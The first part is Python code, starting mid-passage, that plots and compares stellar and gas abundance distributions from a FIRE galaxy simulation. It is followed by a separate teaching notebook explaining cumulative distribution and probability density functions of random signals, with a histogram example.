np.quantile(abund,0.75), 'IQR' : np.quantile(abund,0.75) - np.quantile(abund,0.25), 'std' : np.std(abund)} # compute fraction < a given offset if diff: stats['0.2dex'] = np.size( abund[ np.abs(abund) < 0.2 ]) / (1.0*np.size(abund)) stats['0.1dex'] = np.size( abund[ np.abs(abund) < 0.1 ]) / (1.0*np.size(abund)) stats['0.05dex'] = np.size( abund[ np.abs(abund) < 0.05 ]) / (1.0*np.size(abund)) stats['0.02dex'] = np.size( abund[ np.abs(abund) < 0.02 ]) / (1.0*np.size(abund)) stats['0.01dex'] = np.size( abund[ np.abs(abund) < 0.01 ]) / (1.0*np.size(abund)) stats['0.005dex'] = np.size( abund[ np.abs(abund) < 0.005]) / (1.0*np.size(abund)) if diff: return bins,hist2,stats else: return bins, hist2 ca.abundance_ratio_array?? fig,ax = plt.subplots(2,5,sharey=True,sharex=True) fig.set_size_inches(16,8) fig.subplots_adjust(wspace=0,hspace=0) xy = (0.8,0.90) def plot_ax(ax, e1, e2, data,db=0.1,amin=-4,amax=3): bins, hist1 = MDF(e1,e2,data,amin,amax,age=False,dbin=db) ax.step(bins, hist1/(1.0*np.sum(hist1)), where='post',lw=3,color='black') bins, hist2 = MDF(e1,e2,data,amin,amax,age=True,dbin=db) ax.step(bins, hist2/(1.0*np.sum(hist2)), where='post',lw=3,color='C0') ax.annotate('[' + e1 + '/'+ e2 + ']', xy=xy,xycoords='axes fraction') #x1 = part['star'].prop('massfraction.' + str.lower(e1)).astype(np.double) #x2 = part['star'].prop('massfraction.' 
+ str.lower(e2)).astype(np.double) #x = ca.abundance_ratio_array(e1, x1, e2, x2, input_type=input_type) #abund = x #print(e1,e2,np.min(x),np.mean(x),np.median(x),np.max(x)) #nbins = int((amax - amin)/db) #hist, bins = np.histogram(abund, bins = nbins, range = (amin,amax)) #hist2 = np.ones(np.size(hist)+1) #hist2[:-1] = hist #hist2[-1] = hist2[-2] #ax.step(bins,hist2/(1.0*np.sum(hist2)), where='post',lw=3,color='C1') ksval = ks_2samp(hist1,hist2) #ax.annotate('ks_D = %0.3f \n - p = %.3f'%(ksval[0],ksval[1]),xy=(0.02,xy[1]-0.05),xycoords='axes fraction') return plot_ax(ax[(0,0)],'C','H',data) plot_ax(ax[(0,1)],'N','H',data) plot_ax(ax[(0,2)],'O','H',data) plot_ax(ax[(0,3)],'Ne','H',data) plot_ax(ax[(0,4)],'Mg','H',data) plot_ax(ax[(1,0)],'Si','H',data) plot_ax(ax[(1,1)],'S','H',data) plot_ax(ax[(1,2)],'Ca','H',data) plot_ax(ax[(1,3)],'Fe','H',data) plot_ax(ax[(1,4)],'Mg','Fe',data,amin=-3,amax=3) for ax1 in ax: for ax2 in ax1: ax2.set_ylim(0,0.2) ax[(0,0)].set_ylabel('Fraction') ax[(1,0)].set_ylabel('Fraction') plt.minorticks_on() outname = simulation + '_stellar_MDFs.png' fig.savefig(outname) fig,ax = plt.subplots(2,5,sharey=True,sharex=True) fig.set_size_inches(16,8) fig.subplots_adjust(wspace=0,hspace=0) xy = (0.8,0.90) def plot_ax(ax, e1, e2, data,db=0.1,amin=-4,amax=3): bins, hist1 = MDF(e1,e2,data,amin,amax,age=False,dbin=db) ax.step(bins, np.cumsum(hist1)/(1.0*np.sum(hist1)), where='post',lw=3,color='black') bins, hist2 = MDF(e1,e2,data,amin,amax,age=True,dbin=db) ax.step(bins, np.cumsum(hist2)/(1.0*np.sum(hist1)), where='post',lw=3,color='C0') ax.annotate('[' + e1 + '/'+ e2 + ']', xy=xy,xycoords='axes fraction') ksval = ks_2samp(hist1,hist2) ax.annotate('ks_D = %0.3f \n - p = %.3f'%(ksval[0],ksval[1]),xy=(0.02,xy[1]-0.05),xycoords='axes fraction') return plot_ax(ax[(0,0)],'C','H',data) plot_ax(ax[(0,1)],'N','H',data) plot_ax(ax[(0,2)],'O','H',data) plot_ax(ax[(0,3)],'Ne','H',data) plot_ax(ax[(0,4)],'Mg','H',data) plot_ax(ax[(1,0)],'Si','H',data) 
plot_ax(ax[(1,1)],'S','H',data) plot_ax(ax[(1,2)],'Ca','H',data) plot_ax(ax[(1,3)],'Fe','H',data) plot_ax(ax[(1,4)],'Mg','Fe',data,amin=-3,amax=3) for ax1 in ax: for ax2 in ax1: #ax2.set_ylim(0,1.0) ax2.semilogy() ax2.set_ylim(1.0E-4,1.0) ax2.set_xlim(-4,2) ax[(0,0)].set_ylabel('Fraction') ax[(1,0)].set_ylabel('Fraction') plt.minorticks_on() outname = simulation + '_cumulative_stellar_MDFs.png' fig.savefig(outname) # # Lets try and plot O / Fe vs Fe / H # for the fiducial fire stuff # elements y1e,y2e = "O","Fe" x1e,x2e = "Fe","H" # #y1, y2 = yield_model.elements.index(y1e), yield_model.elements.index(y2e) #x1, x2 = yield_model.elements.index(x1e), yield_model.elements.index(x2e) y1_vals = _get_abund(y1e,data) y2_vals = _get_abund(y2e,data) y1y2 = ca.abundance_ratio_array(y1e, y1_vals, y2e, y2_vals, input_type=input_type) x1_vals = _get_age_abund(x1e,data) x2_vals = _get_age_abund(x2e,data) x1x2 = ca.abundance_ratio_array(x1e, x1_vals, x2e, x2_vals, input_type = input_type) fig, ax = plt.subplots() fig.set_size_inches(6,6) ax.scatter(y1y2, y1y2-x1x2, color = "black", s = 60, marker="o", label = "FIRE") ax.set_ylabel("FIRE - Age Tracer [" + y1e + "/" + y2e + "]") ax.set_xlabel("FIRE[" + x1e + "/" + x2e + "]") ax.legend(loc='best') ax.set_xlim(-5,1) #ax.set_ylim(ax.get_xlim()) ax.set_ylim(-10,10) #ax.plot([-100,100],[-100,100]) plt.minorticks_on() plt.tight_layout() diff = y1y2-x1x2 print(np.size(diff[np.abs(diff)>0.1])/ (1.0*np.size(diff))) fig,ax = plt.subplots(1,2,sharey=True,sharex=True) fig.set_size_inches(12,6) fig.subplots_adjust(wspace=0,hspace=0) xy = (0.05,0.20) def plot_ax(ax, e1, e2, data,db=0.1,amin=-4,amax=3): bins, hist1 = MDF(e1,e2,data,amin,amax,age=False,dbin=db) ax.step(bins, hist1/(1.0*np.sum(hist1)), where='post',lw=3,color='black', label = 'Simulation Abundance') bins, hist2 = MDF(e1,e2,data,amin,amax,age=True,dbin=db) ax.step(bins, hist2/(1.0*np.sum(hist1)), where='post',lw=3,color='C0', label = 'Post-process') ax.annotate('[' + e1 + '/'+ e2 + 
']', xy=xy,xycoords='axes fraction', size = 30) ksval = ks_2samp(hist1,hist2) #x1 = part['star'].prop('massfraction.' + str.lower(e1)).astype(np.double) #x2 = part['star'].prop('massfraction.' + str.lower(e2)).astype(np.double) #x = ca.abundance_ratio_array(e1, x1, e2, x2, input_type=input_type) #abund = x #print(e1,e2,np.min(x),np.mean(x),np.median(x),np.max(x)) #nbins = int((amax - amin)/db) #hist, bins = np.histogram(abund, bins = nbins, range = (amin,amax)) #hist2 = np.ones(np.size(hist)+1) #hist2[:-1] = hist #hist2[-1] = hist2[-2] #ax.step(bins,hist2/(1.0*np.sum(hist2)), where='post',lw=3,color='C1') #ax.annotate('ks_D = %0.3f \n - p = %.3f'%(ksval[0],ksval[1]),xy=(0.02,xy[1]-0.05),xycoords='axes fraction') return plot_ax(ax[0],'O','H',data) plot_ax(ax[1],'Fe','H',data) for a in ax: a.set_ylim(0,0.2) a.set_xlim(-4,2) a.set_xlabel('[X/H] [dex]') ax[0].set_ylabel('Fraction of Stars') plt.minorticks_on() ax[0].legend(loc='upper left') outname = 'O_Fe_stellar_MDFs.png' fig.savefig(outname) fig,ax = plt.subplots(1,2,sharey=True,sharex=True) fig.set_size_inches(12,6) fig.subplots_adjust(wspace=0,hspace=0) xy = (0.05,0.20) def plot_ax(ax, e1, e2, data,db=0.1,amin=-4,amax=3): bins, hist1 = MDF(e1,e2,data,amin,amax,age=False,dbin=db) ax.step(bins, hist1/(1.0*np.sum(hist1)), where='post',lw=3,color='black', label = 'Simulation Abundance') bins, hist2 = MDF(e1,e2,data,amin,amax,age=True,dbin=db) #ax.step(bins, hist2/(1.0*np.sum(hist1)), where='post',lw=3,color='C0', label = 'Post-process') ax.annotate('[' + e1 + '/'+ e2 + ']', xy=xy,xycoords='axes fraction', size = 30) ksval = ks_2samp(hist1,hist2) #x1 = part['star'].prop('massfraction.' + str.lower(e1)).astype(np.double) #x2 = part['star'].prop('massfraction.' 
+ str.lower(e2)).astype(np.double) #x = ca.abundance_ratio_array(e1, x1, e2, x2, input_type=input_type) #abund = x #print(e1,e2,np.min(x),np.mean(x),np.median(x),np.max(x)) #nbins = int((amax - amin)/db) #hist, bins = np.histogram(abund, bins = nbins, range = (amin,amax)) #hist2 = np.ones(np.size(hist)+1) #hist2[:-1] = hist #hist2[-1] = hist2[-2] #ax.step(bins,hist2/(1.0*np.sum(hist2)), where='post',lw=3,color='C1') #ax.annotate('ks_D = %0.3f \n - p = %.3f'%(ksval[0],ksval[1]),xy=(0.02,xy[1]-0.05),xycoords='axes fraction') return plot_ax(ax[0],'O','H',data) plot_ax(ax[1],'Fe','H',data) for a in ax: a.set_ylim(0,0.2) a.set_xlim(-4,2) a.set_xlabel('[X/H] [dex]') ax[0].set_ylabel('Fraction of Stars') plt.minorticks_on() ax[0].legend(loc='upper left') outname = 'O_Fe_stellar_MDFs1.png' fig.savefig(outname) fig,ax = plt.subplots(1,2,sharey=True,sharex=True) fig.set_size_inches(12,6) fig.subplots_adjust(wspace=0,hspace=0) xy = (0.6,0.90) def plot_ax(ax, e1, e2, data,db=0.001,amin=0,amax=3): bins, hist1, stats = MDF(e1,e2,data,amin,amax,diff=True,dbin=db,absval=True) ax.step(bins, np.cumsum(hist1)/(1.0*np.sum(hist1)), where='post',lw=3,color='black', label = 'Simulation Abundance') #bins, hist2 = MDF(e1,e2,data,amin,amax,age=True,dbin=db) #ax.step(bins, hist2/(1.0*np.sum(hist1)), where='post',lw=3,color='C0', label = 'Post-process') #ax.annotate('[' + e1 + '/'+ e2 + ']', xy=xy,xycoords='axes fraction', size = 30) #ksval = ks_2samp(hist1,hist2) #x1 = part['star'].prop('massfraction.' + str.lower(e1)).astype(np.double) #x2 = part['star'].prop('massfraction.' 
+ str.lower(e2)).astype(np.double) #x = ca.abundance_ratio_array(e1, x1, e2, x2, input_type=input_type) #abund = x #print(e1,e2,np.min(x),np.mean(x),np.median(x),np.max(x)) #nbins = int((amax - amin)/db) #hist, bins = np.histogram(abund, bins = nbins, range = (amin,amax)) #hist2 = np.ones(np.size(hist)+1) #hist2[:-1] = hist #hist2[-1] = hist2[-2] #ax.step(bins,hist2/(1.0*np.sum(hist2)), where='post',lw=3,color='C1') #ax.annotate('ks_D = %0.3f \n - p = %.3f'%(ksval[0],ksval[1]),xy=(0.02,xy[1]-0.05),xycoords='axes fraction') return plot_ax(ax[0],'O','H',data) plot_ax(ax[1],'Fe','H',data) for a in ax: #a.set_ylim(0,0.2) a.set_xlim(0,1) a.set_xlabel('[X/H] [dex]') ax[0].set_ylabel('Fraction') plt.minorticks_on() ax[0].legend(loc='upper left') outname = 'O_Fe_stellar_MDF_diff.png' fig.savefig(outname) rc('text',usetex=False) rc('font',size=fsize) fig,ax = plt.subplots(1,2,sharey=True,sharex=True) fig.set_size_inches(12,6) fig.subplots_adjust(wspace=0,hspace=0) amin,amax = 0.0, 3.0 dbin = 0.001 xy = (0.6,0.90) def plot_panel(ax,e1,e2): bins,hist,stats = MDF(e1,e2,data,amin,amax,diff=True,dbin=dbin,absval=True) ax.step(bins, np.cumsum(hist/(1.0*np.sum(hist))), where='post', lw = 3, color = 'C0') size2 = 20 yoff = 0.6 ax.annotate('[' + e1 + '/' + e2 + ']', xy=xy, xycoords = 'axes fraction',size=30) ax.annotate('Median = %0.4f dex'%stats['median'], xy = (xy[0]-0.32,xy[1]-0.1-yoff), xycoords = 'axes fraction', size = size2) #ax.annotate('IQR = %0.4f dex'%stats['IQR'], xy = (xy[0]-0.32,xy[1]-0.2-yoff), xycoords = 'axes fraction', size = size2) ax.annotate('f < 0.05 dex = %0.2f'%(stats['0.05dex']), xy=(xy[0]-0.32,xy[1]-0.2-yoff),xycoords='axes fraction', size = size2) return plot_panel(ax[0], 'O', 'H') plot_panel(ax[1], 'Fe', 'H') for ax2 in ax: ax2.set_ylim(1.0E-2,1.0) #ax2.semilogy() ax2.semilogx() ax[0].set_ylabel('Fraction of Stars') #ax[1].set_ylabel('Fraction') for i in np.arange(2): ax[i].set_xlabel('Abundance Difference [dex]') ax[i].set_xticks([0.001,0.01,0.1,1.0]) 
ax[i].set_xticklabels(["0.001","0.01","0.1","1.0"]) ax[i].yaxis.set_minor_locator(AutoMinorLocator()) outname = 'O_Fe_cumulative_stellar_MDFs_offset.png' fig.savefig(outname) pp = yt.PhasePlot(ds, 'PartType0_O_actual_mass', 'PartType0_O_mass', ('PartType0','particle_mass'), weight_field=None) pp.set_xlim(1.0E-3,10.) pp.set_ylim(1.0E-3,10.) pp.set_log('PartType0_O_actual_mass',True) pp.set_log('PartType0_O_mass',True) x1e = 'O' x2e = 'H' amin,amax = -4,1 fig,ax = plt.subplots(2,5,sharey=True) fig.set_size_inches(16,8) fig.subplots_adjust(wspace=0) #'C', 'N', 'O', 'Ne', 'Mg', 'Si', 'S', 'Ca', 'Fe bins,hist = MDF('C','H',data,amin,amax,age=False,ptype='gas') ax[(0,0)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('C','H',data,amin,amax,age=True,ptype='gas') ax[(0,0)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(0,0)].set_xlabel('[C/H]') bins,hist = MDF('N','H',data,amin,amax,age=False,ptype='gas') ax[(0,1)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('N','H',data,amin,amax,age=True,ptype='gas') ax[(0,1)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(0,1)].set_xlabel('[N/H]') bins,hist = MDF('O','H',data,amin,amax,age=False,ptype='gas') ax[(0,2)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('O','H',data,amin,amax,age=True,ptype='gas') ax[(0,2)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(0,2)].set_xlabel('[O/H]') bins,hist = MDF('Ne','H',data,amin,amax,age=False,ptype='gas') ax[(0,3)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('Ne','H',data,amin,amax,age=True,ptype='gas') ax[(0,3)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(0,3)].set_xlabel('[Ne/H]') bins,hist = MDF('Mg','H',data,amin,amax,age=False,ptype='gas') ax[(0,4)].step(bins, hist/(1.0*np.sum(hist)), 
where='post', lw = 3, color = 'black') bins,hist = MDF('Mg','H',data,amin,amax,age=True,ptype='gas') ax[(0,4)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(0,4)].set_xlabel('[Mg/H]') bins,hist = MDF('Si','H',data,amin,amax,age=False,ptype='gas') ax[(1,0)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('Si','H',data,amin,amax,age=True,ptype='gas') ax[(1,0)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(1,0)].set_xlabel('[Si/H]') bins,hist = MDF('S','H',data,amin,amax,age=False,ptype='gas') ax[(1,1)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('S','H',data,amin,amax,age=True,ptype='gas') ax[(1,1)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(1,1)].set_xlabel('[S/H]') bins,hist = MDF('Ca','H',data,amin,amax,age=False,ptype='gas') ax[(1,2)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('Ca','H',data,amin,amax,age=True,ptype='gas') ax[(1,2)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(1,2)].set_xlabel('[Si/H]') bins,hist = MDF('Fe','H',data,amin,amax,age=False,ptype='gas') ax[(1,3)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('Fe','H',data,amin,amax,age=True,ptype='gas') ax[(1,3)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(1,3)].set_xlabel('[Fe/H]') #bins,hist = MDF('O','Fe',data,-1,1,age=False,ptype='gas') #ax[(1,3)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') #bins,hist = MDF('O','Fe',data,-1,1,age=True,ptype='gas') #ax[(1,3)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') #ax[(1,3)].set_xlabel('[O/Fe]') #bins,hist = MDF('N','O',data,-1,1,age=False,ptype='gas') #ax[(1,4)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') #bins,hist = 
MDF('N','O',data,-1,1,age=True,ptype='gas') #ax[(1,4)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') #ax[(1,4)].set_xlabel('[N/O]') for ax1 in ax: for ax2 in ax1: ax2.set_ylim(0,1.0) ax2.set_xlim(-2.5,2.5) outname = simulation + '_gas_MDFs.png' fig.savefig(outname) fig,ax = plt.subplots(2,5,sharey=True,sharex=True) fig.set_size_inches(16,8) fig.subplots_adjust(wspace=0,hspace=0) amin,amax = -.25,0.25 dbin = 0.005 xy = (0.8,0.90) def plot_panel(ax,e1,e2): bins,hist,stats = MDF(e1,e2,data,amin,amax,diff=True,dbin=dbin) ax.step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax.annotate('[' + e1 + '/' + e2 + ']', xy=xy, xycoords = 'axes fraction') ax.annotate('Median = %0.4f'%stats['median'], xy = (xy[0]-0.32,xy[1]-0.1), xycoords = 'axes fraction') ax.annotate('IQR = %0.4f'%stats['IQR'], xy = (xy[0]-0.32,xy[1]-0.2), xycoords = 'axes fraction') ax.annotate('f > 0.02 dex = %0.2f'%(1.0-stats['0.02dex']), xy=(xy[0]-0.32,xy[1]-0.3),xycoords='axes fraction') return plot_panel(ax[(0,0)], 'C', 'H') plot_panel(ax[(0,1)], 'N', 'H') plot_panel(ax[(0,2)], 'O', 'H') plot_panel(ax[(0,3)], 'Ne', 'H') plot_panel(ax[(0,4)], 'Mg', 'H') plot_panel(ax[(1,0)], 'Si', 'H') plot_panel(ax[(1,1)], 'S', 'H') plot_panel(ax[(1,2)], 'Ca', 'H') plot_panel(ax[(1,3)], 'Fe', 'H') plot_panel(ax[(1,4)], 'Mg', 'Fe') for ax1 in ax: for ax2 in ax1: ax2.set_ylim(0,0.3) ax[(0,0)].set_ylabel('Fraction') ax[(1,0)].set_ylabel('Fraction') for i in np.arange(5): ax[(1,i)].set_xlabel('FIRE - Age Abundance [dex]') outname = simulation + '_stellar_MDFs_offset.png' fig.savefig(outname) print("%8s %8s %8s %8s %8s %8s %8s %8s %8s"%('Ratio','Median','IQR','Q1','Q3','f<0.05dex','f<0.02dex','f<0.01dex','f<0.005dex')) i = 0 med = np.zeros((np.size(yield_model.elements)-2)*4) iqr = np.zeros(np.size(med)) q1 = np.zeros(np.size(med)) q3 = np.zeros(np.size(med)) n01 = np.zeros(np.size(med)) n02 = np.zeros(np.size(med)) n005 = np.zeros(np.size(med)) n05 = np.zeros(np.size(med)) n = 
[None]*np.size(med) d = [None]*np.size(med) amin,amax = -5,2 dbin = 0.05 for denom in ['H','Fe','Mg','O']: for numerator in yield_model.elements: if numerator == 'Total' or numerator == 'He': continue bins,hist,stats = MDF(numerator,denom,data,amin,amax,diff=True,dbin=dbin,absval=True) med[i] = stats['median'] iqr[i] = stats['IQR'] q1[i] = stats['Q1'] q3[i] = stats['Q3'] n[i] = numerator d[i] = denom n01[i] = stats['0.01dex'] n02[i] = stats['0.02dex'] n005[i] = stats['0.005dex'] n05[i] = stats['0.05dex'] print('[%2s/%2s]: %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f'%(n[i],d[i],med[i],iqr[i],q1[i],q3[i], n05[i], n02[i], n01[i], n005[i])) i = i + 1 fig,ax = plt.subplots(2,5,sharey=True,sharex=True) fig.set_size_inches(16,8) fig.subplots_adjust(wspace=0,hspace=0) amin,amax = 0.0, 3.0 dbin = 0.001 xy = (0.8,0.90) def plot_panel(ax,e1,e2): bins,hist,stats = MDF(e1,e2,data,amin,amax,diff=True,dbin=dbin,absval=True) ax.step(bins, np.cumsum(hist/(1.0*np.sum(hist))), where='post', lw = 3, color = 'C0') ax.annotate('[' + e1 + '/' + e2 + ']', xy=xy, xycoords = 'axes fraction') ax.annotate('Median = %0.4f'%stats['median'], xy = (xy[0]-0.32,xy[1]-0.1), xycoords = 'axes fraction') ax.annotate('IQR = %0.4f'%stats['IQR'], xy = (xy[0]-0.32,xy[1]-0.2), xycoords = 'axes fraction') ax.annotate('f < 0.05 dex = %0.2f'%(stats['0.05dex']), xy=(xy[0]-0.5,xy[1]-0.3),xycoords='axes fraction') return plot_panel(ax[(0,0)], 'C', 'H') plot_panel(ax[(0,1)], 'N', 'H') plot_panel(ax[(0,2)], 'O', 'H') plot_panel(ax[(0,3)], 'Ne', 'H') plot_panel(ax[(0,4)], 'Mg', 'H') plot_panel(ax[(1,0)], 'Si', 'H') plot_panel(ax[(1,1)], 'S', 'H') plot_panel(ax[(1,2)], 'Ca', 'H') plot_panel(ax[(1,3)], 'Fe', 'H') plot_panel(ax[(1,4)], 'Mg', 'Fe') for ax1 in ax: for ax2 in ax1: #ax2.set_ylim(1.0E-2,1.0) #ax2.semilogy() ax2.semilogx() ax[(0,0)].set_ylabel('Fraction') ax[(1,0)].set_ylabel('Fraction') for i in np.arange(5): ax[(1,i)].set_xlabel('FIRE - Age Abundance [dex]') outname = simulation + 
'_cumulative_stellar_MDFs_offset.png' fig.savefig(outname) fig,ax=plt.subplots() fig.set_size_inches(6,6) ax.scatter(np.arange(np.size(med)), med) ax.set_ylabel('Median Offset (dex)') t= ax.set_xticks(np.arange(np.size(med))) rat = [None]*len(n) for i in np.arange(len(n)): rat[i] = '[%2s/%2s]'%(n[i],d[i]) t=ax.set_xticklabels(rat, fontsize=8) plt.minorticks_on() #fig.savefig('constFB_offset_fiducial.png') print(n) fig,ax = plt.subplots(2,5,sharey=True,sharex=True) fig.set_size_inches(16,8) fig.subplots_adjust(wspace=0,hspace=0) amin,amax = -0.26,0.26 dbin = 0.02 xy = (0.8,0.90) def plot_panel(ax,e1,e2): bins,hist,stats = MDF(e1,e2,data,amin,amax,diff=True,dbin=dbin,ptype='gas') ax.step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax.annotate('[' + e1 + '/' + e2 + ']', xy=xy, xycoords = 'axes fraction') ax.annotate('Median = %0.4f'%stats['median'], xy = (xy[0]-0.32,xy[1]-0.1), xycoords = 'axes fraction') ax.annotate('IQR = %0.4f'%stats['IQR'], xy = (xy[0]-0.32,xy[1]-0.2), xycoords = 'axes fraction') return plot_panel(ax[(0,0)], 'C', 'H') plot_panel(ax[(0,1)], 'N', 'H') plot_panel(ax[(0,2)], 'O', 'H') plot_panel(ax[(0,3)], 'Ne', 'H') plot_panel(ax[(0,4)], 'Mg', 'H') plot_panel(ax[(1,0)], 'Si', 'H') plot_panel(ax[(1,1)], 'S', 'H') plot_panel(ax[(1,2)], 'Ca', 'H') plot_panel(ax[(1,3)], 'Fe', 'H') plot_panel(ax[(1,4)], 'Mg', 'Fe') for ax1 in ax: for ax2 in ax1: ax2.set_ylim(0,0.5) ax[(0,0)].set_ylabel('Fraction') ax[(1,0)].set_ylabel('Fraction') for i in np.arange(5): ax[(1,i)].set_xlabel('FIRE - Age Abundance [dex]') outname = simulation + '_gas_MDFs_offset.png' fig.savefig(outname) np.logspace(1,2,4) ```
github_jupyter
# Random Signals *This jupyter notebook is part of a [collection of notebooks](../index.ipynb) on various topics of Digital Signal Processing. Please direct questions and suggestions to [Sascha.Spors@uni-rostock.de](mailto:Sascha.Spors@uni-rostock.de).* ## Cumulative Distribution Functions A random process can be characterized by the statistical properties of its amplitude values. [Cumulative distribution functions](https://en.wikipedia.org/wiki/Cumulative_distribution_function) (CDFs) are one possibility to do so. ### Univariate Cumulative Distribution Function The univariate CDF $P_x(\theta, k)$ of a continuous-amplitude real-valued random signal $x[k]$ is defined as \begin{equation} P_x(\theta, k) := \Pr \{ x[k] \leq \theta\} \end{equation} where $\Pr \{ \cdot \}$ denotes the probability that the given condition holds. The univariate CDF quantifies the probability that for the entire ensemble and for a fixed time index $k$ the amplitude $x[k]$ is smaller or equal to $\theta$. The term '*univariate*' reflects the fact that only one random process is considered. The CDF shows the following properties which can be concluded directly from its definition \begin{equation} \lim_{\theta \to -\infty} P_x(\theta, k) = 0 \end{equation} and \begin{equation} \lim_{\theta \to \infty} P_x(\theta, k) = 1 \end{equation} The former property results from the fact that all amplitude values $x[k]$ are larger than $- \infty$, the latter from the fact that all amplitude values lie within $- \infty$ and $\infty$. The univariate CDF $P_x(\theta, k)$ is furthermore a non-decreasing function. The probability that $\theta_1 < x[k] \leq \theta_2$ is given as \begin{equation} \Pr \{\theta_1 < x[k] \leq \theta_2\} = P_x(\theta_2, k) - P_x(\theta_1, k) \end{equation} Hence, the probability that a continuous-amplitude random signal takes a specific value $x[k]=\theta$ is zero when calculated by means of the CDF. This motivates the definition of probability density functions introduced later. 
### Bivariate Cumulative Distribution Function The statistical dependencies between two signals are frequently of interest in statistical signal processing. The bivariate or joint CDF $P_{xy}(\theta_x, \theta_y, k_x, k_y)$ of two continuous-amplitude real-valued random signals $x[k]$ and $y[k]$ is defined as \begin{equation} P_{xy}(\theta_x, \theta_y, k_x, k_y) := \Pr \{ x[k_x] \leq \theta_x \wedge y[k_y] \leq \theta_y \} \end{equation} The joint CDF quantifies the probability for the entire ensemble of sample functions that for a fixed $k_x$ the amplitude value $x[k_x]$ is smaller or equal to $\theta_x$ and that for a fixed $k_y$ the amplitude value $y[k_y]$ is smaller or equal to $\theta_y$. The term '*bivariate*' reflects the fact that two random processes are considered. The bivariate CDF can also be used to characterize the statistical properties of one random signal $x[k]$ at two different time instants $k_1$ and $k_2$ by setting $y[k] = x[k]$ \begin{equation} P_{xx}(\theta_1, \theta_2, k_1, k_2) := \Pr \{ x[k_1] \leq \theta_1 \wedge x[k_2] \leq \theta_2 \} \end{equation} The definition of the bivariate CDF can be extended straightforwardly to the case of more than two random variables. The resulting CDF is termed a multivariate CDF. ## Probability Density Functions [Probability density functions](https://en.wikipedia.org/wiki/Probability_density_function) (PDFs) describe the probability for one or multiple random signals to take on a specific value. Again the univariate case is discussed first. 
### Univariate Probability Density Function The univariate PDF $p_x(\theta, k)$ of a continuous-amplitude real-valued random signal $x[k]$ is defined as the derivative of the univariate CDF \begin{equation} p_x(\theta, k) = \frac{\partial}{\partial \theta} P_x(\theta, k) \end{equation} Due to the properties of the CDF and the definition of the PDF, it shows the following properties \begin{equation} p_x(\theta, k) \geq 0 \end{equation} and \begin{equation} \int\limits_{-\infty}^{\infty} p_x(\theta, k) \, \mathrm{d}\theta = P_x(\infty, k) = 1 \end{equation} The univariate PDF takes only non-negative values and the area below the PDF is equal to one. Due to the definition of the PDF as the derivative of the CDF, the CDF can be computed from the PDF by integration (over the dummy variable $\tau$) \begin{equation} P_x(\theta, k) = \int\limits_{-\infty}^{\theta} p_x(\tau, k) \, \mathrm{d}\tau \end{equation} #### Example - Estimate of a univariate PDF by the histogram In the process of calculating a [histogram](https://en.wikipedia.org/wiki/Histogram), the entire range of amplitude values of a random signal is split into a series of intervals (bins). For a given random signal the number of samples is counted which fall into one of these intervals. This is repeated for all intervals. The counts are finally normalized with respect to the total number of samples. This process constitutes a numerical estimation of the PDF of a random process. In the following example the histogram of an ensemble of random signals is computed for each time index $k$. The CDF is computed by taking the cumulative sum over the histogram bins. This constitutes a numerical approximation of the above integral \begin{equation} \int\limits_{-\infty}^{\theta} p_x(\tau, k) \, \mathrm{d}\tau \approx \sum_{i=0}^{N} p_x(\theta_i, k) \, \Delta\theta_i \end{equation} where $p_x(\theta_i, k)$ denotes the $i$-th bin of the PDF and $\Delta\theta_i$ its width. 
``` %matplotlib inline import numpy as np import matplotlib.pyplot as plt K = 32 # number of temporal samples N = 10000 # number of sample functions bins = 100 # number of bins for the histogram # draw sample functions from a random process np.random.seed(2) x = np.random.normal(size=(N, K)) x += np.tile(np.cos(2*np.pi/K*np.arange(K)), [N, 1]) # compute the histogram px = np.zeros((bins, K)) for k in range(K): px[:, k], edges = np.histogram(x[:, k], bins=bins, range=(-4,4), density=True) # compute the CDF Px = np.cumsum(px, axis=0) * 8/bins # plot the PDF plt.figure(figsize=(10,6)) plt.pcolor(np.arange(K), edges, px) plt.title(r'Estimated PDF $\hat{p}_x(\theta, k)$') plt.xlabel(r'$k$') plt.ylabel(r'$\theta$') plt.colorbar() plt.autoscale(tight=True) # plot the CDF plt.figure(figsize=(10,6)) plt.pcolor(np.arange(K), edges, Px, vmin=0, vmax=1) plt.title(r'Estimated CDF $\hat{P}_x(\theta, k)$') plt.xlabel(r'$k$') plt.ylabel(r'$\theta$') plt.colorbar() plt.autoscale(tight=True) ``` **Exercise** * Change the number of sample functions `N` or/and the number of `bins` and rerun the examples. What changes? Why? In numerical simulations of random processes only a finite number of sample functions and temporal samples can be considered. This holds also for the number of intervals (bins) used for the histogram. As a result, numerical approximations of the CDF/PDF will be subject to statistical uncertainties that typically will become smaller if the number of sample functions `N` is increased. 
